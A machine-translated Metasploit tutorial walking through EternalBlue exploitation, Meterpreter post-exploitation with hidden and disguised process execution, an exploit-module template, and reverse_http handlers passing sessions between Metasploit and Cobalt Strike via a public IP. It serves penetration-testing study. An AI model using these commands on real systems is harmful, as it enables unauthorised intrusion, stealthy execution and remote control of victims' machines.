Detailed msf - meterpreter - penetration testing tutorial
foreword
This article is only for learning and reference, and should not be used for illegal things! !
As we all know, msf is a recognized artifact. When I was young, I didn't know the fragrance of msf and always wanted to write programs by myself.
Now I find that msf is very powerful and can be developed on its basis.
msf is a framework, what does it mean? It can be used to do a whole set of processes of penetration attacks, including early exploration (development), mid-term attack (opening a group), and late-stage control (to push towers).
We can develop our own programs on msfconsole (with its own hero), programs can take advantage of modules in msf (with its equipment)
Introduction to msfconsole
Metasploit is an open-source security vulnerability detection tool that ships with hundreds of known software vulnerabilities and maintains frequent updates. A powerful penetration testing framework dubbed by the security community as "can hack the entire universe".
Five modules:
Exploit refers to an attack performed by an attacker or penetration tester by exploiting a security vulnerability in a system, application or service.
The payload is the code we expect the target system to execute after being penetrated.
Shellcode, is a set of machine instructions that is run as an attack payload in a penetration attack, usually written in assembly language.
Module (Module) refers to a piece of software code component used in the Metasploit framework, which can be used to launch penetration attacks or perform some auxiliary attack actions.
Listener is a component in Metasploit that waits for network connections.
How to use msfconsole - common commands
Use it directly and make an attack
#初次使用:
service postgresql start # 启动数据库服务
msfdb init # 初始化数据库
#之后使用:
msfconsole # 启动metasploit
#查看帮助选项
help
#search - 查看漏洞:
search ms08_067
#use - 使用漏洞:
use exploit/windows/smb/ms08_067_netapi
#show - 查看可以攻击的靶机操作系统型号(targets):
show targets
#set - 设置target 参数(xx是对应被攻击靶机的型号):
set target xx
#set - 设置rhost参数(攻击靶机的ip地址):
set rhost 192.168.xxx.xxx
#show - 查看参数:
show options
#进行攻击:
exploit
For specific parameters, see the help option
help
msfconsole attack actual combat
Since msfconsole is an artifact of intranet penetration, the effect on the extranet is unsatisfactory, and port forwarding and other things need to be considered.
E.g:
在内网,反弹shell可以直接链接到本机IP,
在外网,如果端口转发,回连的IP为外网IP,回连的端口为外网端口
After the payload is successfully uploaded and executed, the meterpreter (pseudo shell) of the target can be obtained
Take an EternalBlue vulnerability process as an example
Penetration process:
First scan with the smb module of msfconsole to see if there are any vulnerabilities
use auxiliary/scanner/smb/smb_ms17_010
Vulnerable
use module
use exploit/windows/smb/ms17_010_eternalblue
show options
Set goals:
set rhost 192.168.148.137
#设置payload等
set lhost 192.168.148.134
set lport 4444
run
Result:
View information:
ok
According to the online tutorial, the payloads are all 64-bit. If the target machine is 32-bit, the architecture will be wrong. You need to download a new module and load it.
How to load new modules and develop new modules, please see the catalog: Loading external modules: Follow-up on the actual combat of ms17_010
Remark:
By default, if a session will have no activity for 5 minutes (300 seconds), it will be killed, to prevent this, change this to
set SessionExpirationTimeout 0
End of penetration:
When the target is penetrated in batches and there are many sessions (the results of many successful attacks), we can perform the following operations
#查看目标
sessions -i
#选择目标
sessions -i id
#批量执行命令
sessions -c cmd
#批量执行命令
sessions -C "meterpreter_cmd"
#从选择的目标返回
background
#退出session,而且关闭所有meterpreter
exit
Loading External Modules: Follow-up on the actual combat of ms17_010
If there is an architecture error in the payload, as shown in Figure 4,
You can use the module on github
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
to copy to the ROOT directory and unzip it.
If it is the msf that comes with kali, copy it to
/usr/share/metasploit-framework/modules/exploits/windows/smb
If it is the msf downloaded after Linux, copy it to
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb
open msf,
reload_all
reload
use exploit/windows/smb/eternalblue_doublepulsar
show options
The exp may be customized based on windows, there are some problems running on linux, so install wine32
wine -h
Exploit
again and an error is reported, try process injection camouflage
set processinject explorer.exe
ok, successfully bounced the shell
meterpreter command execution
-
upload - upload file
upload exe to target machine c:\ls\upload 1.exe c:\\ls\\
-
download - Download the file under any path with the corresponding permissions of the target target machine
Command download file pathdownload c:\\ls\\1.exe
-
sysinfo command
Displays the system information of the remote host, including computer, system information, structure, language and other information.
Run the cmd.exe program on the target host and directly interact with the meterpreter session in a hidden wayexecute -H -i -f cmd.exe execute -H -m -d notepad.exe -f 1.exe -a "-o 2.txt" #-d 在目标主机执行时显示的进程名称(用以伪装) #-m 直接从内存中执行 #"-o 2.txt"1.exe的运行参数
-
portfwd command:
# 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx #查看指定端口开放情况 netstat -an | grep"yyyy"
-
For more commands, enter help to view
show options
set RHOSTS 127.0.0.1 127.0.0.2
bounces two shells, this time
sessions -i 9 can connect to 127.0.0.2 through meterpreterWe go inside the target,
upload sometimes fails:
[-] Error running command upload: Rex::TimeoutError Operation timed out.
Error reasons: insufficient space, high network delay, etc.
msfconsole development practice
In addition to basic usage, you can also develop msf, add modules, modify code, etc.
Browse the msfconsole directory
name | content |
---|---|
data | user interface code |
documentation | Documentation |
external | Source code such as meterpreter |
lib | ruby library (so, to learn Msf well, take a look at the ruby tutorial) |
modules | various modules |
plugins | Various plug-ins such as database connection plug-ins |
scripts | The script used by the meterpreter module |
tools | Miscellaneous Tools + Scripts |
The most important thing is the module, which contains various modules, which can be called and called each other.
Write a module (exp module as an example):
Writing exp module ideas
The real work of exploit development is behind the scenes. It's not actually your language of choice. What you need to think about is: focus on exploits, nothing else
exp module field
function field | content |
---|---|
Name | Vendor, Software, Faulting Component, Vulnerability Type |
Author | author |
Description | Notes |
Platform | Supported platforms, such as: win, linux, osx, unix, bsd |
targets | An array of system, application, settings or special settings, the second element of the entire array is where you store the special metadata of the target. Such as specific offsets, widgets, ret addresses, etc. When the user selects the target, the metadata The data will be loaded and tracked "target index" and can be retrieved via the target method. |
Payloads | Specifies how the payload should be encoded and generated. You can specify: Space, SaveRegisters, Prepend, PrependEncoder, BadChars, Append, AppendEncoder, MaxNops, MinNops, Encoder, Nop, EncoderType, EncoderOptions, ExtendedOptions, EncoderDontFallThrough. |
DisclosureDate | public disclosure date |
Arch | Architecture |
check | Optional, the function called by the check command |
exploit | main function, the real exp function |
exp module example
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
def initialize(info={
})
super(update_info(info,
'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
'Description' => %q{
Say something that the user might need to know
},
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' =>
[
[ 'URL', '' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'System or software version',
{
'Ret' => 0x41414141 # This will be available in `target.ret`
}
]
],
'Payload' => {
'BadChars' => "\x00"
},
'Arch' => ARCH_ARMLE,
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
end
def check
# For the check command
end
def exploit
# Main function
end
end
load module
Copy the rb module to
/opt/metasploit-framework/embedded/framework/modules/exploits/xxx(你取的文件夹名)/xxx.rb(你的文件)
open msf,
reload_all
reload
Later
use exploits/xxx(你取的文件夹名)/xxx.rb(你的文件)
msfconsole extension (used in conjunction with CS)
- Both CobalStrike and Metasploit are infiltration tools, each with its own strengths. The former is more suitable as a stability control platform, while the latter is better at various types of detection collection and vulnerability exploitation in the intranet. The two need more flexible linkage and rely on each other to improve the efficiency of penetration.
CS session goes to msf
1, cs online a pc
2. Set up msf monitoring
#msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http #(这里注意不是TCP,cs4.2我没找到外连TCP的)
set lhost 103.234.72.5
set lport 10086
show options
exploit
3, cs set the listener
Right click on spawn and select this listener.
Go back to msf and you can see that the machine is online.
sessions -l View all sessions
There are far more ways to use CobalStrike and Metasploit in linkage. Each method has corresponding application scenarios in actual combat, and needs to be explored and summarized.
2. The session of msf is transferred to CS
1. First, hang the meterpreter obtained on msf to run in the background
Execute the command: background, you can
2. Then use exploit/windows/local/payload_inject to inject a new payload into the session. The specific commands are as follows:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 103.234.72.5 //cs主机地址
set LPORT 84 //随意设置监听端口,需要和cs保持一致
set session 2 //设置需要派送的meterpreter
set DisablePayloadHandler true //禁止产生一个新的handler
You can see that the machine on the cs side is already online.
-
CS+MSF Summary
There are far more ways to use CobalStrike and Metasploit in linkage. Each method has corresponding application scenarios in actual combat, and needs to be explored and summarized.
Detailed information collection in the testing process means different penetration testing routes , and only the associated use and reuse of information can more effectively magnify the penetration results.
Summarize
MSF can be regarded as the C language. By calling the library, it can complete various batch, high-energy, stable, and high operations, which is very easy to use!